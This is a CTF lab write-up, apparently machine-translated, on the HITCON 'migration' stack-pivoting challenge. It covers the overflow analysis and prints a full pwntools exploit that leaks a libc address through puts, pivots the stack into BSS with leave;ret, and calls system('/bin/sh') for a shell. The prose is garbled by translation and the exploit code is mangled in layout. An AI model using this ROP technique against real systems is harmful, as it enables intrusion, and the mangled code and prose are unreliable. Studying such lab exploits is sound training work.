Pwn-jun-hitcon (III)

Directory

• Pwn-jun-hitcon (III)
  • Lab6-migration
    • Check protection measures
    • Logical Analysis
    • Construct exp

Pwn-jun-hitcon (III)

One day is coming slowly ,??

Lab6-migration

This topic involves stack migration. This example and explanation are provided on CTF-wiki.

This technique is to hijack the stack pointer to the memory that attackers can control, and then perform a drop operation at the corresponding position. In general, we may need to use

• The number of bytes of stack overflow that can be controlled is small, and it is difficult to construct a long drop chain.
• With pie protection enabled, the stack address is unknown. We can hijack the stack to a known area.
• Other vulnerabilities are difficult to exploit, so we need to convert them. For example, we need to hijack the stack to the heap space, so as to write the ROP on the stack and exploit the heap vulnerabilities.

In addition, there are several requirements for using Stack consumer ting:

• You can control the program execution flow.
• You can control the SP pointer. Generally, the Control Stack pointer uses the drop object (ROP), and the common gadgets for controlling the stack pointer is generally

pop rsp/esp

In this case, the overflow length is insufficient, leading to the inability to construct the ropchain at a time and limiting the number of overflow times of the main function.

Check protection measures

checksec migration

NX is enabled.

Logical Analysis

IDA:

The Buf size is 0x28 = 40 bytes, while read reads 0x40 = 64 bytes.

Run GDB to see the details:

That is to say, four bytes are read into the EBP, and the remaining 20 overflow bytes can be used to construct the ropchain.

Search for available gadget:

Construct exp

Exp:

#! /Usr/bin/Python #-*-coding: UTF-8-*-sfrom pwn import * context. log_level = 'debug' P = process ('. /migration ') Elf = elf (". /migration ") libc = elf ("/lib/i386-linux-gnu/libc. so.6 ") system_libc = libc. symbols ["system"] print "system_libc:" + hex (system_libc) read_plt = elf. PLT ["read"] print "read_plt:" + hex (read_plt) puts_got = elf. got ["puts"] print "puts_got:" + hex (puts_got) puts_plt = elf. PLT ["puts"] print "puts_plt:" + hex (puts_plt) puts_libc = libc. symbols ["puts"] print "puts_libc:" + hex (puts_libc) binsh_libc = libc. search ("/bin/sh "). next () print "binsh_libc:" + hex (binsh_libc) leave_ret = 0x08048418p3ret = 0x08048569 # Pop ESI; pop EDI; pop EBP; retp1ret = 0x0804836d # records = elf. BSS () + 0x500buf2 = elf. BSS () + 0x400payload = 'A' * 40 # buf1 is EBP, EIP ==> read_plt ==> leave_ret is the return address ==> read (0, buf1, 0x100) payload + = p32 (buf1) + p32 (read_plt) + p32 (leave_ret) + p32 (0) + p32 (buf1) + p32 (0x100) # Leave; ret => mov EBP, esp; pop EBP; ret; p. recvuntil (": \ n") p. send (payload) sleep (0.1) # Use leave_ret to take buf2 as EBP, get puts_addr, get binsh through libc leakage, system_addrpayload = p32 (buf2) + p32 (puts_plt) + p32 (p1ret) + p32 (puts_got) + p32 (read_plt) + p32 (leave_ret) + p32 (0) + p32 (buf2) + p32 (0x100) p. send (payload) sleep (0.1) puts_addr = u32 (P. recv (4) print "puts_addr:" + hex (puts_addr) offset = puts_addr-puts_libcsystem_addr = system_libc + offsetbinsh = binsh_libc + offset ''' payload = p32 (buf1) + p32 (read_plt) + p32 (p3ret) + p32 (0) + p32 (buf1) + p32 (0x100) + p32 (system_addr) + p32 (0 xdeadbeef) + p32 (buf1) p. send (payload) sleep (0.1) # P. send ("/bin/sh \ 0") p. interactive () ''' # pushed forced stack payload = p32 (buf1) + p32 (system_addr) + "BBBB" + p32 (binsh) p. send (payload) sleep (0.1) p. interactive ()

Exp running effect:

This fake stack frame is forged to construct the ropchain, which is a feast of digestion. I need to digest LaB6.

Today, I also read a pwn question in the First Anniversary special competition of anheng-over. I found that only EBP and EIP can be controlled ??? I didn't expect it to be an original question of the June competition of the anheng cup. It was found in the fancy Stack Overflow Technique of CTF-wiki, and like LaB6, it was done by controlling EBP and EIP, however, there are no extra overflow bytes.

In general, both of them can be called counterfeit stack frames: CTF-WIKI-Fancy stack overflow.

Pwn-jun-hitcon (III)